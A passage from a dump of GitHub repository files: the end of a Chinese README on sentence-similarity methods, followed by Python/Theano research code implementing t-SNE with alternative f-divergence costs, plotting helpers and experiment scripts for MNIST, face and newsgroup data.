', time.time()-start)\n\n\n\n" }, { "alpha_fraction": 0.7309417128562927, "alphanum_fraction": 0.7668161392211914, "avg_line_length": 16.719999313354492, "blob_id": "490c23142ebf483075ee28c7db424b34d1fc61d6", "content_id": "a7d14dea7452235a83d07258e179ad6d9036f6a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 666, "license_type": "no_license", "max_line_length": 102, "num_lines": 25, "path": "/README.md", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# 句子相似度算法\n\n### 1. 基于bm25的句子相似度算法\n\n 准确率很低\n\n### 2. 基于hownet的句子相似度算法\n\n在[别人的基础上实现](https://github.com/HuangFJ/text-similarity),准确率很低\n\n### 3. 基于词向量余弦距离的句子相似度算法\n\n基于gensim的n_similarity函数实现、自己实现\n\n### 4. 基于word2vec+LSTM的句子相似度算法\n\n准确率: 93%\n\n### 5. mpcnn\n\n别人实现的两个基于论文《Multi-Perspective Sentence Similarity Modeling with Convolutional Neural Networks》的句子相似度算法\n\nhttps://github.com/lc222/MPCNN-sentence-similarity-tensorflow\n\nhttps://github.com/yat011/mpcnn\n\n\n\n" } ]
10
jiwoongim/ft-SNE
https://github.com/jiwoongim/ft-SNE
c462f77eb3b9c1901b69b8e67ae9942437ec9ff7
4b5c368ee561c151f36cb25b654830bd38dc9a5b
ec97933d2e493e0c4077a62ac418a407d0f5afa8
refs/heads/master
2022-10-27T10:45:03.158185
2018-09-18T19:04:36
2018-09-18T19:04:36
149,327,619
15
1
MIT
2018-09-18T17:32:54
2022-10-08T12:43:21
2022-10-08T23:36:03
Python
[ { "alpha_fraction": 0.5889233350753784, "alphanum_fraction": 0.6059752106666565, "avg_line_length": 28.20164680480957, "blob_id": "cc05e6105c2d5617caf03315dc0cf2a90b24b88e", "content_id": "342d6d4123f483ca00bd45c45816e893be40c3f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7096, "license_type": "permissive", "max_line_length": 109, "num_lines": 243, "path": "/core.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "\"\"\"\nCode taken from https://raw.githubusercontent.com/hma02/thesne/master/model/tsne.py \nAnd then modified.\n\"\"\"\n\nimport os, sys\nimport theano.tensor as T\nimport theano\nimport numpy as np\n\nfrom utils import dist2hy\n\nimport theano.sandbox.rng_mrg as RNG_MRG\nimport theano.tensor.shared_randomstreams as RNG_TRG\nfrom theano.tensor.shared_randomstreams import RandomStreams\n\nRNG = np.random.RandomState(0)\nMRG = RNG_MRG.MRG_RandomStreams(RNG.randint(2 ** 30))\nTRG = RNG_TRG.RandomStreams(seed=1234)\n\nepsilon = 1e-6\nfloath = np.float32\n\n\ndef sqeuclidean_var(X):\n\n N = X.shape[0]\n ss = (X ** 2).sum(axis=1)\n\n return ss.reshape((N, 1)) + ss.reshape((1, N)) - 2*X.dot(X.T)\n\n\ndef discrete_sample(preds, num_sam, temperature=1.0):\n # function to sample an index from a probability array\n\n probas = TRG.choice(a=np.arange(3), size=[num_sam,], p=preds)\n return np.argmax(probas, axis=1)\n\n\ndef euclidean2_np(X):\n N = X.shape[0]\n ss = np.sum(X**2, axis=1)\n dist = np.reshape(ss, [N, 1]) + np.reshape(ss, [1, N]) - 2*np.dot(X, X.T)\n dist = dist * np.asarray(dist>0,'float32')\n return dist \n\n\ndef p_Xp_given_X_np(X, sigma, metric, approxF=0):\n\n N = X.shape[0]\n if metric == 'euclidean':\n sqdistance = euclidean2_np(X)\n elif metric == 'precomputed':\n sqdistance = X**2\n else:\n raise Exception('Invalid metric')\n euc_dist = np.exp(-sqdistance / (np.reshape(2*(sigma**2), [N, 1])))\n np.fill_diagonal(euc_dist, 0.0 )\n\n if approxF > 0:\n sorted_euc_dist = euc_dist[:,:]\n np.sort(sorted_euc_dist, axis=1)\n row_sum = np.reshape(np.sum(sorted_euc_dist[:,1:approxF+1], axis=1), [N, 1])\n else:\n row_sum = np.reshape(np.sum(euc_dist, axis=1), [N, 1])\n\n return euc_dist/row_sum # Possibly dangerous\n\n\ndef p_Xp_given_X_var(X, sigma, metric):\n N = X.shape[0]\n\n if metric == 'euclidean':\n sqdistance = sqeuclidean_var(X)\n elif metric == 'precomputed':\n sqdistance = X**2\n else:\n raise Exception('Invalid metric')\n\n esqdistance = T.exp(-sqdistance / ((2 * (sigma**2)).reshape((N, 1))))\n esqdistance_zd = T.fill_diagonal(esqdistance, 0)\n\n row_sum = T.sum(esqdistance_zd, axis=1).reshape((N, 1))\n\n return esqdistance_zd/row_sum \n\n\ndef p_Xp_X_var(p_Xp_given_X):\n return (p_Xp_given_X + p_Xp_given_X.T) / 2.0\n\n\ndef p_Yp_Y_var(Y):\n N = Y.shape[0]\n sqdistance = sqeuclidean_var(Y)\n one_over = T.fill_diagonal(1/(sqdistance + 1), 0)\n p_Yp_given_Y = one_over/one_over.sum(axis=1).reshape((N, 1)) \n return p_Yp_given_Y\n\n\ndef p_Yp_Y_var_np(Y):\n N = Y.shape[0]\n sqdistance = euclidean2_np(Y)\n one_over = 1./(sqdistance + 1)\n p_Yp_given_Y = one_over/one_over.sum(axis=1).reshape((N, 1)) \n return p_Yp_given_Y\n\n\ndef kl_cost_var(X, Y, sigma, metric):\n\n p_Xp_given_X = p_Xp_given_X_var(X, sigma, metric)\n PX = p_Xp_X_var(p_Xp_given_X)\n PY = p_Yp_Y_var(Y)\n\n PXc = T.maximum(PX, epsilon)\n PYc = T.maximum(PY, epsilon)\n return T.mean(T.sum(PX * T.log(PXc / PYc),-1)) \n\n\ndef reverse_kl_cost_var(X, Y, sigma, metric):\n\n p_Xp_given_X = p_Xp_given_X_var(X, sigma, metric)\n PX = p_Xp_X_var(p_Xp_given_X)\n PY = p_Yp_Y_var(Y)\n\n PXc = T.maximum(PX, epsilon)\n PYc = T.maximum(PY, epsilon)\n return -T.mean(T.sum(PY * T.log(PXc / PYc),-1)) \n\ndef js_cost_var(X, Y, sigma, metric):\n\n return kl_cost_var(X, Y, sigma, metric) * 0.5 + \\\n reverse_kl_cost_var(X, Y, sigma, metric) * 0.5\n\n\ndef chi_square_cost_var(X, Y, sigma, metric):\n\n p_Xp_given_X = p_Xp_given_X_var(X, sigma, metric)\n PX = p_Xp_X_var(p_Xp_given_X)\n PY = p_Yp_Y_var(Y)\n\n PXc = T.maximum(PX, epsilon)\n PYc = T.maximum(PY, epsilon)\n return T.mean(T.sum(PY * (PXc / PYc - 1.)**2, -1)) \n\n\ndef hellinger_cost_var(X, Y, sigma, metric):\n\n p_Xp_given_X = p_Xp_given_X_var(X, sigma, metric)\n PX = p_Xp_X_var(p_Xp_given_X)\n PY = p_Yp_Y_var(Y)\n\n PXc = T.maximum(PX, epsilon)\n PYc = T.maximum(PY, epsilon)\n return T.mean(T.sum(PY * (T.sqrt(PXc / PYc) - 1.)**2,-1)) \n\n\ndef find_sigma(X_shared, sigma_shared, N, perplexity, sigma_iters,\n metric, verbose=0):\n \"\"\"Binary search on sigma for a given perplexity.\"\"\"\n X = T.fmatrix('X')\n sigma = T.fvector('sigma')\n\n target = np.log(perplexity)\n\n P = T.maximum(p_Xp_given_X_var(X, sigma, metric), epsilon)\n\n entropy = -T.sum(P*T.log(P), axis=1)\n\n # Setting update for binary search interval\n sigmin_shared = theano.shared(np.full(N, np.sqrt(epsilon), dtype=floath))\n sigmax_shared = theano.shared(np.full(N, np.inf, dtype=floath))\n\n sigmin = T.fvector('sigmin')\n sigmax = T.fvector('sigmax')\n\n upmin = T.switch(T.lt(entropy, target), sigma, sigmin)\n upmax = T.switch(T.gt(entropy, target), sigma, sigmax)\n\n givens = {X: X_shared, sigma: sigma_shared, sigmin: sigmin_shared,\n sigmax: sigmax_shared}\n updates = [(sigmin_shared, upmin), (sigmax_shared, upmax)]\n\n update_intervals = theano.function([], entropy, givens=givens,\n updates=updates)\n\n # Setting update for sigma according to search interval\n upsigma = T.switch(T.isinf(sigmax), sigma*2, (sigmin + sigmax)/2.)\n\n givens = {sigma: sigma_shared, sigmin: sigmin_shared,\n sigmax: sigmax_shared}\n updates = [(sigma_shared, upsigma)]\n\n update_sigma = theano.function([], sigma, givens=givens, updates=updates)\n\n for i in range(sigma_iters):\n e = update_intervals()\n update_sigma()\n if verbose:\n print('Iteration: {0}.'.format(i+1))\n print('Perplexities in [{0:.4f}, {1:.4f}].'.format(np.exp(e.min()),\n np.exp(e.max())))\n\n if np.any(np.isnan(np.exp(e))):\n raise Exception('Invalid sigmas. The perplexity is probably too low.')\n\n\ndef find_sigma_np(X, sigma, N, perplexity, sigma_iters, metric, verbose=1, approxF=0):\n\n \"\"\"Binary search on sigma for a given perplexity.\"\"\"\n target = np.log(perplexity)\n\n # Setting update for binary search interval\n sigmin = np.full(N, np.sqrt(epsilon), dtype='float32')\n sigmax = np.full(N, np.inf, dtype='float32')\n\n for i in range(sigma_iters):\n\n P = np.maximum(p_Xp_given_X_np(X, sigma, metric, approxF), epsilon)\n entropy = -np.sum(P*np.log(P), axis=1)\n minind = np.argwhere(entropy < target).flatten()\n maxind = np.argwhere(entropy > target).flatten()\n sigmin[minind] = sigma[minind]\n sigmax[maxind] = sigma[maxind]\n\n infmask = np.argwhere(np.isinf(sigmax)).flatten()\n old_sigma = sigma[infmask]\n sigma = (sigmin + sigmax)/2.\n sigma[infmask] = old_sigma*2\n\n\n if verbose:\n print('Iteration: {0}.'.format(i+1))\n print('Perplexities in [{0:.4f}, {1:.4f}].'.format(np.exp(entropy.min()), np.exp(entropy.max())))\n\n if np.any(np.isnan(np.exp(entropy))):\n raise Exception('Invalid sigmas. The perplexity is probably too low.')\n\n\n return sigma\n\nif __name__ == '__main__':\n asdf = discrete_sample(np.asarray([0.3,0.2,0.5]), 1000)\n import pdb; pdb.set_trace()\n" }, { "alpha_fraction": 0.5486871004104614, "alphanum_fraction": 0.5756747126579285, "avg_line_length": 31.247058868408203, "blob_id": "4c5cb9155dac33dd601b680df6416bd2106d5d58", "content_id": "8cbfe5d5327b05797db51a0a270b90a4629cf139", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5484, "license_type": "permissive", "max_line_length": 102, "num_lines": 170, "path": "/utils_sne.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "import os, sys, gzip, pickle, cPickle\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nfrom utils import unpickle\nfrom core import p_Xp_given_X_np, p_Yp_Y_var_np\n\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef plot_map_news(xx, colors, color_dict, fname):\n\n plt.figure()\n ax = plt.subplot(111)\n\n area = np.pi * 4 #* (15 * np.random.rand(N))**2 # 0 to 15 point radii\n #jfor i, x in enumerate(xx):\n #j plt.scatter(xx[i,0], xx[i,1], s=area, c=colors[i], alpha=0.5, cmap=plt.cm.Spectral)\n\n for i, x in enumerate(xx):\n plt.scatter(x[0], x[1], s=area, c=color_dict[colors[i]], alpha=0.7, facecolor='0.8', lw = 0)\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=3)\n plt.axis('off')\n plt.savefig(fname, bbox_inches='tight', format='pdf')\n\n\ndef plot_map_c(xx, colors, fname):\n\n plt.figure()\n ax = plt.subplot(111)\n\n area = np.pi * 4 #* (15 * np.random.rand(N))**2 # 0 to 15 point radii\n #jfor i, x in enumerate(xx):\n #j plt.scatter(xx[i,0], xx[i,1], s=area, c=colors[i], alpha=0.5, cmap=plt.cm.Spectral)\n plt.scatter(xx[:,0], xx[:,1], s=area, c=colors, alpha=1.0, cmap=plt.cm.Spectral, \\\n facecolor='0.5', lw = 0)\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=3)\n plt.axis('off')\n plt.savefig(fname, bbox_inches='tight', format='pdf')\n\n\ndef plot1D(xx, colors, fname):\n\n plt.figure()\n ax = plt.subplot(111)\n\n area = np.pi * 5 #* (15 * np.random.rand(N))**2 # 0 to 15 point radii\n #jfor i, x in enumerate(xx):\n #j plt.scatter(xx[i,0], xx[i,1], s=area, c=colors[i], alpha=0.5, cmap=plt.cm.Spectral)\n #plt.plot(xx, c=colorVal, alpha=0.9, lw = 0)\n dummy = np.zeros_like(xx)\n plt.scatter(xx, dummy, s=area, c=colors, alpha=0.9, cmap=plt.cm.Spectral, facecolor='0.5', lw = 0)\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=3)\n\n plt.savefig(fname, bbox_inches='tight', format='pdf')\n\n\n\ndef plot3D(xx, colors, fname):\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n area = np.pi *5 #* (15 * np.random.rand(N))**2 # 0 to 15 point radii\n ax.scatter(xx[:,0], xx[:,1], xx[:,2], c=colors, s=area, alpha=0.5, cmap=plt.cm.Spectral, \\\n facecolor='0.5', lw = 0)\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=3)\n plt.axis('off')\n plt.savefig(fname, bbox_inches='tight', format='pdf', transparent=True)\n\n\ndef precision_K(p_sorted_ind, q_sorted_ind, Ks, K=3):\n\n p_sorted_ind = p_sorted_ind[:, :K]\n q_sorted_ind = q_sorted_ind[:, :K]\n N = p_sorted_ind.shape[0]\n\n accuracy = np.zeros((N,len(Ks)))\n\n # For each point in x compute the distance of K points in P and Q\n for j,kk in enumerate(Ks):\n for i in xrange(N):\n for k in xrange(kk):\n ind_k = q_sorted_ind[i, k]\n tmp_k = np.argwhere(ind_k == p_sorted_ind[i,:kk]).flatten()\n if tmp_k.shape[0] > 0:\n accuracy[i,j] += 1.0\n\n # Count the number of correct indices \n outputs = []\n for jj in xrange(len(Ks)):\n outputs += [[np.mean(accuracy[:,jj]), np.std(accuracy[:,jj])]]\n\n return outputs\n\n\ndef K_neighbours(data, maxK=10, revF=False, sigma=None):\n\n from utils import dist2hy_np\n #dists = dist2hy_np(data, data)\n if sigma is not None:\n dists = p_Xp_given_X_np(data, sigma, 'euclidean')\n else:\n dists = p_Yp_Y_var_np(data)\n N, _ = dists.shape\n sorted_ind_p = np.zeros((N,maxK), dtype='int32')\n\n for i in xrange(N):sorted_ind_p[i,:] = np.argsort(dists[i,:])[1:maxK+1]\n if revF: sorted_ind_p = sorted_ind_p[:,::-1]\n\n return sorted_ind_p, dists\n\n\ndef neighbour_accuracy_K(data, labels, Ks, maxK=10):\n\n #from utils import dist2hy_np\n #dists = dist2hy_np(data, data)\n N, _ = data.shape\n\n fractions = []\n for i in xrange(N):\n\n #ind_sort = np.argsort(dists[i,:])[1:maxK+1]\n ind_sort = data[i,:]\n label = labels[i]\n neighbor_labels = labels[ind_sort]\n fraction = np.asarray(neighbor_labels == label) * 1.0\n fractions.append(fraction)\n\n fractions = np.asarray(fractions)\n output = []\n for K in Ks:\n output += [np.mean(np.sum(fractions[:,:K], axis=1) / K), \\\n np.std(np.sum(fractions[:,:K], axis=1) / K)]\n\n return output\n\n\ndef get_iris_data():\n\n data, label = [], []\n f = open('/groups/branson/home/imd/Documents/data/embedding_data/iris.txt', 'r')\n line = f.readline()\n data.append(line[:-1])\n label.append(line[-1])\n while line.strip() != '':\n line = f.readline()\n data.append(line[:-1])\n label.append(line[-1])\n\n return np.asarray(data), np.asarrya(label)\n\n\n" }, { "alpha_fraction": 0.5690361261367798, "alphanum_fraction": 0.595087468624115, "avg_line_length": 29.5, "blob_id": "09723dfac86ad54f64e12abd2cf57d2f677cf05d", "content_id": "339a42bad2564fea7afefff86ed4a921ced49cc2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2687, "license_type": "permissive", "max_line_length": 136, "num_lines": 88, "path": "/run.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "import os, sys, gzip, pickle, cPickle, argparse\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nfrom tsne import tsne\n\nfrom utils import unpickle, plot_map\nfrom utils_sne import precision_K, K_neighbours\n\nfrom sklearn.decomposition import PCA\nRNG = np.random.RandomState(0)\n\ndef parse_args():\n desc = \"Pytorch implementation of AAE collections\"\n parser = argparse.ArgumentParser(description=desc)\n\n parser.add_argument('--dataset_path', type=str, \\\n default='./data/',\\\n help='Dataset directory')\n parser.add_argument('--divtypet', type=str, default='kl', \\\n choices=['kl','rkl','js','hl', 'ch'],\n help='Choose your f-divergence')\n parser.add_argument('--perplexity_tsne', type=int, default=100, \\\n help='Perplexity')\n\n return parser.parse_args()\n\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n divtypet = args.divtypet\n dataset_path = args.dataset_path\n perplexity_tsne = args.perplexity_tsne\n\n dataset_path = dataset_path \n data = np.load(dataset_path+'/data.npy')\n label = np.load(dataset_path+'/label.npy')\n datatype='mydata'\n\n pca = PCA(n_components=30)\n pcastr = 'pca30'\n\n data = pca.fit(data).transform(data)\n perm = RNG.permutation(data.shape[0])\n data = data [perm][:6000]\n color= label[perm][:6000]\n initial_momentum=0.5\n n_epochs_tsne=2000; \n if divtypet=='hl':\n initial_lr_tsne=300\n momentum_switch=200\n lrDecay=100\n elif divtypet=='ch':\n initial_lr_tsne=10;\n momentum_switch=200\n lrDecay=100\n elif divtypet=='rkl':\n initial_lr_tsne=1000; \n momentum_switch=200\n lrDecay=100\n elif divtypet=='js':\n initial_lr_tsne=1000;\n momentum_switch=200\n lrDecay=100\n else:\n initial_lr_tsne=2500\n momentum_switch=200\n lrDecay=100\n\n print 'Divtype %s, Perplexity %d' % (divtypet, perplexity_tsne)\n fname = '/'+datatype+'/'+divtypet+'/tsne_'+str(perplexity_tsne)+'perp'+str(n_epochs_tsne)+'epoch_initlr'+str(initial_lr_tsne)+pcastr\n projX = tsne(data, \n initial_lr=initial_lr_tsne, \\\n final_lr=initial_lr_tsne,\\\n lrDecay=lrDecay,\\\n initial_momentum=initial_momentum,\\\n momentum_switch=momentum_switch,\\\n perplexity=perplexity_tsne, \\\n n_epochs=n_epochs_tsne, fname=fname, \\\n color=color, divtype=divtypet, datatype=datatype)\n\n print(fname)\n pass\n\n\n\n" }, { "alpha_fraction": 0.5112971663475037, "alphanum_fraction": 0.5499734282493591, "avg_line_length": 33.342464447021484, "blob_id": "7014485bdc2fa3164e05ff4fabd4269b215aff0d", "content_id": "0982538daedef5c3f41cde3ad0aaa7ff8c725142", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7524, "license_type": "permissive", "max_line_length": 139, "num_lines": 219, "path": "/main.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "import os, sys, gzip, pickle, cPickle, argparse\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nfrom tsne import tsne\n\nfrom utils import unpickle, plot_map\nfrom utils_sne import precision_K, K_neighbours\n\nfrom sklearn.decomposition import PCA\nRNG = np.random.RandomState(0)\n\ndef parse_args():\n desc = \"Pytorch implementation of AAE collections\"\n parser = argparse.ArgumentParser(description=desc)\n\n parser.add_argument('--datatype', type=str, default='mnist', \\\n choices=['mnist','mnist1','face','news'],\n help='The name of dataset')\n parser.add_argument('--dataset_path', type=str, \\\n default='./data/',\\\n help='Dataset directory')\n parser.add_argument('--divtypet', type=str, default='kl', \\\n choices=['kl','rkl','js','hl', 'ch'],\n help='Choose your f-divergence')\n parser.add_argument('--perplexity_tsne', type=int, default=100, \\\n help='Perplexity')\n\n return parser.parse_args()\n\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n divtypet = args.divtypet\n dataset_path = args.dataset_path\n perplexity_tsne = args.perplexity_tsne\n\n if args.datatype == 'mnist':\n dataset_path = dataset_path + '/mnist.pkl.gz'\n f = gzip.open(dataset_path, 'rb')\n train_set_np, valid_set_np, test_set_np = cPickle.load(f)\n\n ind0 = np.argwhere(train_set_np[1] == 0).flatten()\n ind1 = np.argwhere(train_set_np[1] == 1).flatten()\n ind2 = np.argwhere(train_set_np[1] == 2).flatten()\n ind3 = np.argwhere(train_set_np[1] == 4).flatten()\n ind4 = np.argwhere(train_set_np[1] == 5).flatten()\n ind = np.concatenate([ind0, ind1, ind2, ind3, ind4])\n\n data = train_set_np[0][ind]\n label= train_set_np[1][ind]\n pca = PCA(n_components=30)\n pcastr = 'pca30_5class'\n\n data = pca.fit(data).transform(data)\n perm = RNG.permutation(data.shape[0])\n data = data [perm][:6000]\n color= label[perm][:6000]\n initial_momentum=0.5\n n_epochs_tsne=2000; \n if divtypet=='hl':\n initial_lr_tsne=300\n momentum_switch=200\n lrDecay=100\n elif divtypet=='ch':\n initial_lr_tsne=10;\n momentum_switch=200\n lrDecay=100\n elif divtypet=='rkl':\n initial_lr_tsne=1000; \n momentum_switch=200\n lrDecay=100\n elif divtypet=='js':\n initial_lr_tsne=1000;\n momentum_switch=200\n lrDecay=100\n else:\n initial_lr_tsne=2500\n momentum_switch=200\n lrDecay=100\n\n elif args.datatype == 'mnist1':\n dataset_path = dataset_path + '/MNIST/mnist.pkl.gz'\n f = gzip.open(dataset_path, 'rb')\n train_set_np, valid_set_np, test_set_np = cPickle.load(f)\n\n ind = np.argwhere(train_set_np[1] == 1).flatten()\n\n data = train_set_np[0][ind]\n label= train_set_np[1][ind]\n pca = PCA(n_components=30)\n pcastr = 'pca30_1class'\n data = pca.fit(data).transform(data)\n perm = RNG.permutation(data.shape[0])\n data = data [perm][:5000]\n color= label[perm][:5000]\n\n\n initial_momentum=0.5; momentum_switch=200\n n_epochs_tsne=200; \n if divtypet=='hl':\n initial_lr_tsne=300\n lrDecay=100\n elif divtypet=='ch':\n initial_lr_tsne=5; \n momentum_switch=1\n lrDecay=100\n elif divtypet=='rkl':\n initial_lr_tsne=1000; \n lrDecay=100\n elif divtypet=='js':\n initial_lr_tsne=1000; \n lrDecay=100\n else:\n initial_lr_tsne=1000 \n lrDecay=100\n\n elif args.datatype == 'face':\n \n import scipy.io as sio\n mat_contents = sio.loadmat(dataset_path+'/face_data.mat')\n data = mat_contents['images'].T\n light = (mat_contents['lights'].T - mat_contents['lights'].T.min()) / mat_contents['lights'].T.max()\n poses = (mat_contents['poses'].T - mat_contents['poses'].T.min()) / (mat_contents['poses'].T.max() - mat_contents['poses'].T.min())\n color = poses[:,0] \n \n n_epochs_tsne=1000; \n pcastr = 'pose1'\n if divtypet=='hl':\n initial_momentum=0.5\n initial_lr_tsne=100\n momentum_switch=100\n lrDecay=10.0\n elif divtypet=='ch':\n initial_momentum=0.5\n initial_lr_tsne=100\n momentum_switch=100\n lrDecay=10\n elif divtypet=='rkl':\n initial_momentum=0.5\n initial_lr_tsne=1000; \n momentum_switch=25\n lrDecay=50\n elif divtypet=='js':\n initial_momentum=0.5\n initial_lr_tsne=1000;\n momentum_switch=200\n lrDecay=100\n else:\n initial_momentum=0.5\n initial_lr_tsne=1000 \n momentum_switch=200\n lrDecay=100\n\n elif args.datatype == 'news':\n\n from sklearn.datasets import fetch_20newsgroups\n from sklearn.feature_extraction.text import TfidfVectorizer\n categories = ['rec.autos', 'rec.motorcycles', 'rec.sport.baseball', 'rec.sport.hockey', \\\n 'sci.crypt', 'sci.electronics', 'sci.med', 'sci.space', 'soc.religion.christian', \\\n 'talk.politics.guns', 'talk.politics.mideast', 'talk.politics.misc', 'talk.religion.misc']\n newsgroups_train = fetch_20newsgroups(subset='train', categories=categories)\n vectorizer = TfidfVectorizer()\n data = vectorizer.fit_transform(newsgroups_train.data).todense().astype('float32')\n\n color = newsgroups_train.target\n pca = PCA(n_components=30)\n pcastr = '_pca30_3hier'\n\n data = pca.fit(data).transform(data)\n data, color = data[:6000], color[:6000]\n data = data / (data.max()-data.min()) \n n_epochs_tsne=300; \n if divtypet=='hl':\n initial_momentum=0.5\n initial_lr_tsne=100\n momentum_switch=200\n lrDecay=5\n elif divtypet=='ch':\n initial_momentum=0.5\n initial_lr_tsne=100 \n momentum_switch=200\n lrDecay=100\n elif divtypet=='rkl':\n initial_momentum=0.5\n initial_lr_tsne=1000\n momentum_switch=100\n lrDecay=25\n elif divtypet=='js':\n initial_momentum=0.5\n initial_lr_tsne=3000;\n momentum_switch=200\n lrDecay=100\n else:\n initial_momentum=0.5\n initial_lr_tsne=1500\n momentum_switch=200\n lrDecay=100\n\n\n print 'Divtype %s, Perplexity %d' % (divtypet, perplexity_tsne)\n fname = args.datatype+'/'+divtypet+'/tsne_'+str(perplexity_tsne)+'perp'+str(n_epochs_tsne)+'epoch_initlr'+str(initial_lr_tsne)+pcastr\n projX = tsne(data, \n initial_lr=initial_lr_tsne, \\\n final_lr=initial_lr_tsne,\\\n lrDecay=lrDecay,\\\n initial_momentum=initial_momentum,\\\n momentum_switch=momentum_switch,\\\n perplexity=perplexity_tsne, \\\n n_epochs=n_epochs_tsne, fname=fname, \\\n color=color, divtype=divtypet, datatype=args.datatype)\n\n print(fname)\n pass\n\n\n\n" }, { "alpha_fraction": 0.5788095593452454, "alphanum_fraction": 0.595940887928009, "avg_line_length": 30.493127822875977, "blob_id": "5aa44f5a73f22ed2cbef7c17976d5b7c618a5c07", "content_id": "b8caa1cf3506224a7ed0be21b7167c8ea22a8f90", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18329, "license_type": "permissive", "max_line_length": 134, "num_lines": 582, "path": "/utils.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "''' Version 1.000\n Code provided by Daniel Jiwoong Im \n Permission is granted for anyone to copy, use, modify, or distribute this\n program and accompanying programs and documents for any purpose, provided\n this copyright notice is retained and prominently displayed, along with\n a note saying that the original programs are available from our\n web page.\n The programs and documents are distributed without any warranty, express or\n implied. As the programs were written for research purposes only, they have\n not been tested to the degree that would be advisable in any important\n application. All use of these programs is entirely at the user's own risk.'''\n\n\nimport os, sys, cPickle, math, pylab #, PIL\nimport matplotlib as mp\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nfrom numpy.lib import stride_tricks\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.shared_randomstreams import RandomStreams\nimport theano.sandbox.rng_mrg as RNG_MRG\n#from subnets.layers.utils import rng\nrng = np.random.RandomState(0)\nMRG = RNG_MRG.MRG_RandomStreams(rng.randint(2 ** 30))\n\n\ndef plot_map(xx, fname):\n\n plt.figure()\n ax = plt.subplot(111)\n\n area = np.pi \n colors = cm.rainbow(np.linspace(0, 1, len(xx)))\n for i, x in enumerate(xx):\n plt.scatter(x[:,0], x[:,1], s=area, c=colors[i, :], alpha=0.8, cmap=plt.cm.Spectral, \\\n facecolor='0.5', lw = 0)\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=3)\n\n plt.savefig(fname, bbox_inches='tight', format='pdf')\n\n\ndef divide_by_labels(xx, yy, num_class=10):\n\n xx_list = []\n for i in xrange(num_class):\n\n indice = np.argwhere(yy==i).flatten()\n xx_list.append(xx[indice])\n\n return xx_list\n\n\ndef prob_K_per(prob, Ks):\n\n N = prob.shape[0]\n sorted_prob_ind = np.argsort(prob, axis=1)[:,::-1]\n\n probKs = []\n for k in Ks:\n probK = prob[j, sorted_prob_ind[:,k]]\n probKs.append([np.mean(probK, axis=0), np.std(probK, axis=0)])\n\n probKs = np.asarray(probKs)\n return probKs\n\n\ndef uncompress_sparseMatrix(matrice):\n\n data = []; labels = []\n n = matrice.shape[0]\n for i in xrange(n):\n data.append(matrice[i][0].todense())\n labels.append(np.ones(matrice[i][0].shape[0]) * i)\n data = np.vstack(data).astype('float32')\n perm = rng.permutation(data.shape[0])\n labels = np.hstack(labels)\n\n return data[perm], labels[perm]\n\ndef floatX(X):\n return np.asarray(X, dtype=theano.config.floatX)\n\n\n\ndef conv_cond_concat(x, y):\n \"\"\" \n concatenate conditioning vector on feature map axis \n \"\"\"\n return T.concatenate([x, y*T.ones((x.shape[0], y.shape[1], x.shape[2], x.shape[3]))], axis=1)\n\n\ndef init_conv_weights(W_low, W_high, filter_shape, numpy_rng, rng_dist='normal'):\n \"\"\"\n initializes the convnet weights.\n \"\"\"\n\n if 'uniform' in rng_dist:\n return np.asarray(\n numpy_rng.uniform(low=W_low, high=W_high, size=filter_shape),\n dtype=theano.config.floatX)\n elif rng_dist == 'normal':\n return 0.01 * numpy_rng.normal(size=filter_shape).astype(theano.config.floatX)\n\n\ndef initialize_weight(n_vis, n_hid, W_name, numpy_rng, rng_dist):\n \"\"\"\n \"\"\"\n\n if 'uniform' in rng_dist:\n W = numpy_rng.uniform(low=-np.sqrt(6. / (n_vis + n_hid)),\\\n high=np.sqrt(6. / (n_vis + n_hid)),\n size=(n_vis, n_hid)).astype(theano.config.floatX)\n elif rng_dist == 'normal':\n W = 0.01 * numpy_rng.normal(size=(n_vis, n_hid)).astype(theano.config.floatX)\n elif rng_dist == 'ortho': ### Note that this only works for square matrices\n N_ = int(n_vis / float(n_hid))\n sz = np.minimum(n_vis, 